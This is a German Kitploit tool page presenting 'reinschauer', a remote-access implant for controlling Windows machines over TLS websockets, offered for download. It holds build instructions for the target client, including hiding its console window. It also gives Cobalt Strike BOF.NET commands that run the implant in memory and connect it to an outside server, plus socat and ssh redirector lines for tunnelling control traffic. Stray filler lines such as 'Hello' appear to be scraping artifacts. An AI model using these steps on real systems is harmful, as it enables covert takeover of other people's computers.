Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
reinschauer — Es ist sehr gut. | Kitploit
Tools/GitHubGitHub/ps1337/reinschauer
Post-ExploitationCommand and ControlRed TeamingRemote-Access-ToolRemote-Access-TrojanerArchived
GitHubps1337/reinschauer

reinschauer

Es ist sehr gut.

Repository anzeigen
515664vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Reinschauer

Hello

Ein PoC zur Fernsteuerung von Windows-Maschinen über Websockets. Eine ausführliche Beschreibung findest du in meinem Blog.

Hello

  • Kann als Go-Exe, .NET/C#-Exe und im Speicher mithilfe von BOF.NET und Cobaltstrike ausgeführt werden.

Hello

  • Der Traffic kann über eine interaktive Beacon-Verbindung getunnelt werden.
  • Anders als die meisten HVNC-Implementierungen konvertiert reinschauer rohe Bitmaps in JPEG und komprimiert die resultierenden Daten, bevor sie über das Netzwerk gesendet werden, um die Framegröße zu reduzieren.
  • FPS- und Qualitätseinstellungen können dynamisch über die GUI geändert werden. Diese wirken sich auf das Implant aus, sodass der Netzwerkverkehr reduziert wird. Durch die dynamische Skalierung kann dieses Tool als Implant für Maschinen mit großen Bildschirmen verwendet werden.

Hello

  • Grundlegende Maus- und Tastatursteuerung ist möglich.
  • Du kannst das Skript im Ordner server verwenden, um TLS-Serverdateien zu generieren, oder eigene mitbringen.
  • Das Serverfenster kann frei in der Größe verändert werden, während Klickereignisse sollten™ korrekt auf das entsprechende Pixel der Zielmaschine übertragen werden.
  • Verwende reinschauer-server -h für verfügbare Optionen.

Protokoll

root@kitploit:~
+----------------------------------------------------------------------------------------+
|                                                                                        |
|                                                                                        |
|                  +----------------------------------------------------+                |
|                  |#1: Type (Binary or Text)                           |                |
|                  |    Binary: JPG Frame                               |                |
|                  |                                                    |                |
|                  |#2: Text                                            |                |
|                  |    ELO (Ping)                                      |                |
|                  |    FPS <FPS Count>                                 |                |
|                  |    SCL <Scaler Count>                              |                |
|                  |    QUL <JPG Quality>                               |                |
|                  |    LCL X Y (Left Click + Coordinates)              |                |
|                  |    RCL X Y                                         |                |
|                  |    KEY <Char>                                      |      xxxxxx    |
|       xxxxx   <--+----------------------------------------------------+--> xxxx   xx   |
|       x   xx                     Websockets via TLS                        xx       x  |
| x     xxxxxx                                                                xxxxxxxxx  |
| xxx     x   xx                                                          xx    x        |
|     xxxxxxxx                                                              xxxxx xxxxxx |
|         x                                                                   xxxxx      |
|         xx                                                                   xx        |
|         x xx                                                                 xxx       |
|        xx  xx                                                                x xx      |
|        x    xx                                                              xx  xxx    |
|       x      xx                                                             x     xx   |
|       x       x                                                            xx      x   |
+----------------------------------------------------------------------------------------+

FAQ

Wie baue ich es?

  • Installiere eine neue Version von Golang, >=1.18
  • Für Debian-basierte Distributionen: sudo apt -y install libx11-dev libxcursor-dev xorg-dev libgl1-mesa-dev
root@kitploit:~
$ cd client && GOOS=windows GOARCH=amd64 go build
$ cd server && GOOS=linux GOARCH=amd64 go build

Ich habe eine vorgefertigte und eigenständige Version der Dotnet-Variante in diesem Repository beigefügt. Wenn du sie selbst erstellen möchtest, verwende die Visual-Studio-Projektdatei, um die x64-Release-Variante zu erstellen. Falls dies nicht automatisch geschieht, lade die erforderlichen NuGet-Pakete für das Projekt über Visual Studio herunter. Dein Zielsystem hat diese Pakete höchstwahrscheinlich ebenfalls nicht installiert, daher könnten DLLs fehlen, wenn die resultierende EXE auf dem Ziel ausgeführt wird. Um dieses Problem zu umgehen, ruft dieses Projekt automatisch ILMerge.exe auf, um die resultierende EXE zusammen mit den erforderlichen Bibliotheken zu bündeln. Verwende daher auf den Zielsystemen die generierte Datei namens reinschauer-dotnet-standalone.exe.

Möglicherweise musst du vorher etwas mit go get holen. Verwende -ldflags -H=windowsgui, um das Konsolenfenster zu deaktivieren.

Wer ist der Client/Server?

Der client wird auf der Zielmaschine (Windows) ausgeführt. Die server-Komponente wird auf der Maschine des Testers (Linux) ausgeführt. Sie lauscht standardmäßig auf 0.0.0.0:6969. Sowohl der Golang- als auch der C#-Client sind mit dem Server kompatibel.

Ist das ein HVNC / Hidden Desktop?

Nein. Es verwendet denselben Desktop wie der Benutzer.

Einige Tasten und Tastenkombinationen funktionieren nicht, bitte beheben

Ich weiß, dass |, @ und § derzeit möglicherweise nicht funktionieren, zumindest auf meiner deutschen Gurken-Tastatur. Bitte fixen.

Der Client verbraucht zu viel CPU-Zeit

Ein niedrigerer FPS-Wert könnte helfen.

Ich habe keine direkte Verbindung zwischen client und server

Du kannst ein CobaltStrike-Beacon verwenden, um den Verkehr zu tunneln.

Ich habe kein Cobaltstrike!

Verwende einen socat-Redirector wie:

root@kitploit:~
socat TCP4-LISTEN:1337,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost6969 <IP>

und starte den Client mit den erforderlichen Parametern oder hardcoden.

Hinweise zur Verwendung von BOF.NET und Cobaltstrike

Richte zuerst BOF.NET gemäß dem Handbuch ein. Lade außerdem die Standalone-EXE mit bofnet_load <Path to Exe>. Entscheide dann, wie du Reinschauer verwenden möchtest:

  1. Du kannst den Traffic über eine aktive Beacon-Verbindung tunneln.
  2. Du kannst Traffic an jeden anderen internetfähigen Server senden.

Traffic über ein Beacon tunneln

  • Stelle die Sitzung auf interaktiv: sleep 0.
  • Richte die Remote-Port-Weiterleitung ein: rportfwd_local 6969 127.0.0.1 6969.
  • Führe Reinschauer im Hintergrund aus: bofnet_job reinschauer_dotnet.BofStuff. Dadurch verbindet sich Reinschauer automatisch mit 127.0.0.1:6969 auf 127.0.0.1 der Zielmaschine. Dies deaktiviert auch TLS, da ohnehin die Beacon-Verbindung genutzt wird.
  • Um Reinschauer zu beenden, verwende bofnet_jobkill <Job ID>.

Senden von Traffic an einen anderen Server

  • Führe Reinschauer im Hintergrund aus: bofnet_job reinschauer_dotnet.BofStuff <Server IP> <Server Port> true. Der boolesche Parameter aktiviert die TLS-Nutzung.
  • Um Reinschauer zu beenden, verwende bofnet_jobkill <Job ID>.

Verwende dann SSH und die GatewayPorts-Funktion: Füge GatewayPorts: clientspecified zur sshd_config hinzu und starte den SSH-Server neu. Danach macht ssh -R '0.0.0.0:8080:localhost:6969'' [...] deinen lokalen Port 6969 unter 0.0.0.0:8080 verfügbar. Sei vorsichtig :)

Oder richte auf dem Server einen socat-Redirector ein:

root@kitploit:~
socat TCP4-LISTEN:<Server Port>,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost6969 <IP>
Tool herunterladen